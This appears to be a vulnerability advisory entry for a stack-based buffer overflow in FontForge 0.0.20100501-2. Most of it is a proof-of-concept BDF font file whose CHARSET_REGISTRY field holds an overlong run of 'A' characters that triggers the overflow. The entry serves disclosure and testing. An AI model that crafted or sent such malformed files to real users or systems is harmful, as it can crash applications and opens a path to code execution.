44 lines
No EOL
1.1 KiB
Text
44 lines
No EOL
1.1 KiB
Text
Source: https://www.securityfocus.com/bid/45162/info
|
|
|
|
FontForge is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
|
|
|
|
An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
|
|
|
|
FontForge 0.0.20100501-2 is vulnerable; other versions may also be affected.
|
|
|
|
PoC:
|
|
|
|
STARTFONT 2.1
|
|
FONT -gnu-unifont-medium-r-normal--16-160-75-75-c-80-iso10646-1
|
|
SIZE 16 75 75
|
|
CHARSET_REGISTRY AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
FONTBOUNDINGBOX 16 16 0 -2
|
|
STARTPROPERTIES 2
|
|
FONT_ASCENT 14
|
|
FONT_DESCENT 2
|
|
ENDPROPERTIES
|
|
CHARS 1
|
|
STARTCHAR U+0041
|
|
ENCODING 65
|
|
SWIDTH 500 0
|
|
DWIDTH 8 0
|
|
BBX 8 16 0 -2
|
|
BITMAP
|
|
00
|
|
00
|
|
00
|
|
00
|
|
18
|
|
24
|
|
24
|
|
42
|
|
42
|
|
7E
|
|
42
|
|
42
|
|
42
|
|
42
|
|
00
|
|
00
|
|
ENDCHAR
|
|
ENDFONT |